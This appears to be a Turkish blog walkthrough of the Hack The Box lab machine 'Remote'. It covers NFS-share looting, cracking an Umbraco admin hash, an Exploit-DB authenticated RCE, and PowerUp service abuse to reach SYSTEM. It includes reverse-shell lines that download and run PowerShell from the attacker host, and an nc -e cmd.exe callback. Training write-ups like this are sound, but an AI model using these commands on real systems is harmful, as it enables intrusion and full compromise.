İçeriğe geç

Remote

Makine Adı Seviye OS Logo
Remote - HTB Kolay Windows

Walkthrough

nmap taraması:


┌──(root💀kali)-[~]                                                                            
└─# nmap 10.10.10.180 -p- -A -T4 -Pn                                                           
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 18:55 EDT
Stats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 71.43% done; ETC: 18:56 (0:00:07 remaining)
Nmap scan report for 10.10.10.180                                                                                                                                                             
Host is up (0.074s latency).                                                                   
Not shown: 65528 filtered ports
PORT      STATE SERVICE       VERSION                                                          
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:           
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000) 
| rpcinfo:         
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs                                                                                                                                                        
|   100003  2,3,4       2049/tcp   nfs                                                         
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp   mountd                                                                                                                                               [0/73]
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005) 
49666/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-05T22:57:36
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   74.57 ms 10.10.14.1
2   75.16 ms 10.10.10.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.09 seconds

ftp'de bir şey çıkmadı. 80'e baktıktan sonra sadece bulduğum şey Umbraco CMS olduğu. Bu cms ile ilgili internette exploitler var ancak credential'a ihtiyacımız var. Bunun için incelemeler yapmaya devam ettim.


┌──(root💀kali)-[~/10.10.10.180]                                                               
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.180/ --no-error -t 50 --wordlist /usr/share/wordlists/dirb/big.txt --extensions aspx,html,txt | tee gobuster1
===============================================================    
Gobuster v3.1.0                                                                                
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)      
===============================================================    
[+] Url:                     http://10.10.10.180/                  
[+] Method:                  GET                                                               
[+] Threads:                 50                                                                
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt     
[+] Negative Status codes:   404                                                               
[+] User Agent:              gobuster/3.1.0                                                    
[+] Extensions:              aspx,html,txt                                                     
[+] Add Slash:               true                                                              
[+] Follow Redirect:         true                                                              
[+] Expanded:                true                                                              
[+] Timeout:                 10s                                                               
===============================================================     
2021/10/05 19:37:40 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.180/1111/                (Status: 200) [Size: 4196]
http://10.10.10.180/1111.aspx            (Status: 200) [Size: 4196]
http://10.10.10.180/Base/                (Status: 400) [Size: 11]  
http://10.10.10.180/Blog.aspx            (Status: 200) [Size: 5001]
http://10.10.10.180/Contact/             (Status: 200) [Size: 7880]
http://10.10.10.180/Blog/                (Status: 200) [Size: 5001]
http://10.10.10.180/Contact.aspx         (Status: 200) [Size: 7880]
http://10.10.10.180/Home/                (Status: 200) [Size: 6703]
http://10.10.10.180/Default.aspx         (Status: 200) [Size: 6693]
http://10.10.10.180/Home.aspx            (Status: 200) [Size: 6703]
http://10.10.10.180/People/              (Status: 200) [Size: 6749]
http://10.10.10.180/Products/            (Status: 200) [Size: 5338]
http://10.10.10.180/People.aspx          (Status: 200) [Size: 6749]
http://10.10.10.180/Products.aspx        (Status: 200) [Size: 5338]
http://10.10.10.180/about-us/            (Status: 200) [Size: 5451]
http://10.10.10.180/about-us.aspx        (Status: 200) [Size: 5451]
http://10.10.10.180/base/                (Status: 400) [Size: 11]  
http://10.10.10.180/blog/                (Status: 200) [Size: 5011]
http://10.10.10.180/blog.aspx            (Status: 200) [Size: 5011]
http://10.10.10.180/contact.aspx         (Status: 200) [Size: 7890]
http://10.10.10.180/contact/             (Status: 200) [Size: 7890]
http://10.10.10.180/default.aspx         (Status: 200) [Size: 6693]
http://10.10.10.180/home/                (Status: 200) [Size: 6703]
http://10.10.10.180/home.aspx            (Status: 200) [Size: 6703]
http://10.10.10.180/install/             (Status: 200) [Size: 4040]
http://10.10.10.180/intranet/            (Status: 200) [Size: 3323]
http://10.10.10.180/intranet.aspx        (Status: 200) [Size: 3323]
http://10.10.10.180/master/              (Status: 500) [Size: 3420]
http://10.10.10.180/master.aspx          (Status: 500) [Size: 3420]
http://10.10.10.180/people/              (Status: 200) [Size: 6739]
http://10.10.10.180/people.aspx          (Status: 200) [Size: 6739]
http://10.10.10.180/person.aspx          (Status: 200) [Size: 2741]
http://10.10.10.180/person/              (Status: 200) [Size: 2741]
http://10.10.10.180/product/             (Status: 500) [Size: 3420]
http://10.10.10.180/product.aspx         (Status: 500) [Size: 3420]
http://10.10.10.180/products.aspx        (Status: 200) [Size: 5328]
http://10.10.10.180/products/            (Status: 200) [Size: 5328]
http://10.10.10.180/umbraco/             (Status: 200) [Size: 4040]

===============================================================
2021/10/05 19:54:46 Finished
===============================================================

┌──(root💀kali)-[~]                                                                            
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.180/umbraco/ --no-error -t 50 --wordlist /usr/share/wordlists/dirb/big.txt --extensions aspx,html,txt | tee 10
.10.10.180/gobuster2                                                                           
===============================================================            
Gobuster v3.1.0                                                                                
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)              
===============================================================            
[+] Url:                     http://10.10.10.180/umbraco/                  
[+] Method:                  GET                                                               
[+] Threads:                 50                                                                
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt             
[+] Negative Status codes:   404                                                               
[+] User Agent:              gobuster/3.1.0                                                    
[+] Extensions:              aspx,html,txt                                                     
[+] Add Slash:               true                                                              
[+] Follow Redirect:         true                                                              
[+] Expanded:                true                                                              
[+] Timeout:                 10s                                                               
===============================================================            
2021/10/05 19:38:28 Starting gobuster in directory enumeration mode        
===============================================================           
http://10.10.10.180/umbraco/Default/             (Status: 200) [Size: 4040]
http://10.10.10.180/umbraco/Members/             (Status: 403) [Size: 1233][[3~^[[3~^[[3~
http://10.10.10.180/umbraco/Search/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/actions/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/application/         (Status: 200) [Size: 2934]
http://10.10.10.180/umbraco/assets/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/config/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/controls/            (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/create.aspx          (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/create/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/dashboard/           (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/default/             (Status: 200) [Size: 4040]
http://10.10.10.180/umbraco/developer/           (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/dialogs/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/install/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/js/                  (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/lib/                 (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/logout.aspx          (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/masterpages/         (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/members/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/ping.aspx            (Status: 200) [Size: 12]  
http://10.10.10.180/umbraco/plugins/             (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/preview/             (Status: 200) [Size: 4040]
http://10.10.10.180/umbraco/search/              (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/settings/            (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/translation/         (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/tree.aspx            (Status: 200) [Size: 657] 
http://10.10.10.180/umbraco/views/               (Status: 403) [Size: 1233]
http://10.10.10.180/umbraco/webservices/         (Status: 403) [Size: 1233]

===============================================================
2021/10/05 19:55:16 Finished
===============================================================

Daha sonrasında nfs'e baktım.

┌──(root💀kali)-[~]
└─# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

┌──(root💀kali)-[~]
└─# mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180                      

┌──(root💀kali)-[~]
└─# cd /mnt/10.10.10.180

┌──(root💀kali)-[/mnt/10.10.10.180]
└─# ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

Uzun bir süre içeride inceleme yaptım ancak çok fazla dosya var bu yüzden bazı elemeler yapmamız gerekmektedir.

https://our.umbraco.com/forum/umbraco-7/using-umbraco-7/74780-how-do-i-check-what-db-umbraco-is-using sayfasına baktığımızda database bilgilerinin config dosyalarında umbracoDbDSN tagi ile saklandığını gödüm. Bunun üzerine bu anahtar kelimeye göre arama yaptım.


┌──(root💀kali)-[/mnt/10.10.10.180]
└─# grep -R "umbracoDbDSN" . | grep -v 'Lang'
grep: ./bin/Umbraco.Core.dll: binary file matches
./Web.config:           <remove name="umbracoDbDSN" />
./Web.config:           <add name="umbracoDbDSN" connectionString="Data Source=|DataDirectory|\Umbraco.sdf;Flush Interval=1;" providerName="System.Data.SqlServerCe.4.0" />
┌──(root💀kali)-[/mnt/10.10.10.180]
└─# find . -name '*Umbraco.sdf*' -exec ls -al {} \; 2>/dev/null 
-rwx------ 1 nobody 4294967294 1965978 Feb 20  2020 ./App_Data/Umbraco.sdf

Dosya binary bir dosyaydı.

┌──(root💀kali)-[/mnt/10.10.10.180]
└─# file ./App_Data/Umbraco.sdf                                 
./App_Data/Umbraco.sdf: data

https://fileinfo.com/extension/sdf adresine baktığımızda bunun bir db dosyası olduğunu anladım ve string ile inceleme yapmaya başladım.


┌──(root💀kali)-[/mnt/10.10.10.180]
└─# strings ./App_Data/Umbraco.sdf | nl | grep '[email protected]' | head
     4  [email protected]{"hashAlgorithm":"SHA1"}[email protected]
     5  [email protected]{"hashAlgorithm":"SHA1"}[email protected]
  1109  User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
  1110  User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
  1111  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
  1112  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
  1113  User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/logoutlogout success
  1114  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
  1115  User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/sign-in/loginlogin success
  1116  User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity

Harika bir hash bulduk. Daha sonrasında bunu kırmayı denedim.

┌──(root💀kali)-[/mnt/10.10.10.180]
└─# john /root/10.10.10.180/hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   ([email protected])
1g 0:00:00:01 DONE (2021-10-06 18:21) 0.8547g/s 8396Kp/s 8396Kc/s 8396KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Daha sonrasında bulduğum exploitleri denmeye karar verdim.

┌──(root💀kali)-[~/10.10.10.180]                                                                                                                              
└─# searchsploit Umbraco CMS                                                                                                                                  
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path                           
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                         | windows/webapps/19671.rb        
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                  | aspx/webapps/46153.py           
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                  | aspx/webapps/49488.py           
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                  | php/webapps/44988.txt           
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results                                                                                                                                        
Papers: No Results                                                                                                                                            

┌──(root💀kali)-[~/10.10.10.180]                                                                                                                              
└─# searchsploit -m aspx/webapps/49488.py                                                                                                                     
  Exploit: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                                                                         
      URL: https://www.exploit-db.com/exploits/49488                                                                                                          
     Path: /usr/share/exploitdb/exploits/aspx/webapps/49488.py                                                                                                
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators                                                             

Copied to: /root/10.10.10.180/49488.py                                                                                                                        
┌──(root💀kali)-[~/10.10.10.180]
└─# python3 49488.py -u [email protected] -p baconandcheese -i http://10.10.10.180 -c hostname                                                              2 ⨯
remote

Harika artık reverse alabiliriz.


┌──(root💀kali)-[/opt]
└─# wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Will not apply HSTS. The HSTS database must be a regular and non-world-writable file.
ERROR: could not open HSTS store at '/root/.wget-hsts'. HSTS will be disabled.
--2021-10-06 19:14:00--  https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4339 (4.2K) [text/plain]
Saving to: ‘Invoke-PowerShellTcp.ps1’

Invoke-PowerShellTcp.ps1                100%[=============================================================================>]   4.24K  --.-KB/s    in 0s      

2021-10-06 19:14:01 (25.2 MB/s) - ‘Invoke-PowerShellTcp.ps1’ saved [4339/4339]

┌──(root💀kali)-[/opt]
└─# nano Invoke-PowerShellTcp.ps1 

┌──(root💀kali)-[/opt]
└─# tail Invoke-PowerShellTcp.ps1 
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.21 -Port 443

Invoke-PowerShellTcp dosyasını düzenledim ve reerse aldım.


┌──(root💀kali)-[~/10.10.10.180]
└─# python3 49488.py -u [email protected] -p baconandcheese -i http://10.10.10.180 -c 'powershell.exe' -a "iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.21/Invoke-PowerShellTcp.ps1'));"

┌──(root💀kali)-[~]
└─# nc -lvp 443
listening on [any] 443 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49694
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd C:/Users
PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   3:12 PM                .NET v2.0                                                             
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic                                                     
d-----        2/19/2020   3:12 PM                .NET v4.5                                                             
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic                                                     
d-----         7/9/2021   6:50 AM                Administrator                                                         
d-----        2/19/2020   3:12 PM                Classic .NET AppPool                                                  
d-r---        2/20/2020   2:42 AM                Public                                                                

PS C:\Users> cd Public
PS C:\Users\Public> dir

    Directory: C:\Users\Public

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---        2/19/2020   3:03 PM                Documents                                                             
d-r---        9/15/2018   3:19 AM                Downloads                                                             
d-r---        9/15/2018   3:19 AM                Music                                                                 
d-r---        9/15/2018   3:19 AM                Pictures                                                              
d-r---        9/15/2018   3:19 AM                Videos                                                                
-ar---        10/6/2021   5:53 PM             34 user.txt                                                              

PS C:\Users\Public> cat user.txt
b44487ceb09f1a33d682e163f098182f

AMSI bypass işlemi gerçekleştirdim ve priv için scriptlerimi indirmeye başadlım.


PS C:\Users\Public> iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.21/PowerUp.ps1'));
PS C:\Users\Public> Invoke-AllChecks                    

Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2452
ProcessId   : 3040
Name        : 3040
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

PS C:\Users\Public> Get-ChildItem : Access to the path 'C:\ProgramData\USOPrivate' is denied.
At line:4516 char:21
+ ... $XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.x ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\ProgramData\USOPrivate:String) [Get-ChildItem], UnauthorizedAccess 
   Exception
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

İşimiz kolay ve zevkli gözüküyor. Unquoted path attack gerçekleştireceğiz. Bir deneme yapalım.


PS C:\Users\Public> Invoke-ServiceAbuse -Name 'UsoSvc'                                                                                                        

ServiceAbused Command                                                                                                                                         
------------- -------                                                                                                                                         
UsoSvc        net user john Password123! /add && net localgroup Administrators john /add  

PS C:\Users\Public> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
The command completed successfully.

İçeriye nc.exe atıp reverse almayı denemek istiyorum. Bunun için pc'nin kaç bit olduğunu kontrol ettim.


PS C:\Users\Public> [System.Environment]::Is64BitOperatingSystem
True

PS C:\Windows\Temp>                                                                                                                                           
PS C:\Windows\Temp> Invoke-WebRequest -Uri "http://10.10.14.21/nc64.exe" -OutFile "C:\Windows\Temp\nc64.exe" 

PS C:\Windows\Temp>  Invoke-ServiceAbuse -Name UsoSvc -Command "C:\Windows\Temp\nc64.exe 10.10.14.21 4444 -e cmd.exe"

┌──(root💀kali)-[/opt/PowerSploit/Privesc]
└─# nc -lvp 4444                                                           1 ⨯
listening on [any] 4444 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.180] 49692
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator
cd C:\Users\Administrator

C:\Users\Administrator>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D582-9880

 Directory of C:\Users\Administrator

07/09/2021  06:50 AM    <DIR>          .
07/09/2021  06:50 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          3D Objects
02/19/2020  04:03 PM    <DIR>          Contacts
02/20/2020  03:41 AM    <DIR>          Desktop
02/19/2020  05:26 PM    <DIR>          Documents
02/23/2020  02:22 PM    <DIR>          Downloads
02/19/2020  04:03 PM    <DIR>          Favorites
02/19/2020  04:03 PM    <DIR>          Links
02/19/2020  04:03 PM    <DIR>          Music
02/19/2020  04:03 PM    <DIR>          Pictures
02/19/2020  04:03 PM    <DIR>          Saved Games
02/20/2020  01:45 AM    <DIR>          Searches
02/19/2020  04:03 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  13,410,852,864 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D582-9880

 Directory of C:\Users\Administrator\Desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
10/06/2021  08:11 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  13,410,656,256 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
6d2275070481c4ed17c8dc4ede319c6e

C:\Users\Administrator\Desktop>  

Son zamanlarda çözdüğüm en zevkli makinelerden biriydi!

Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir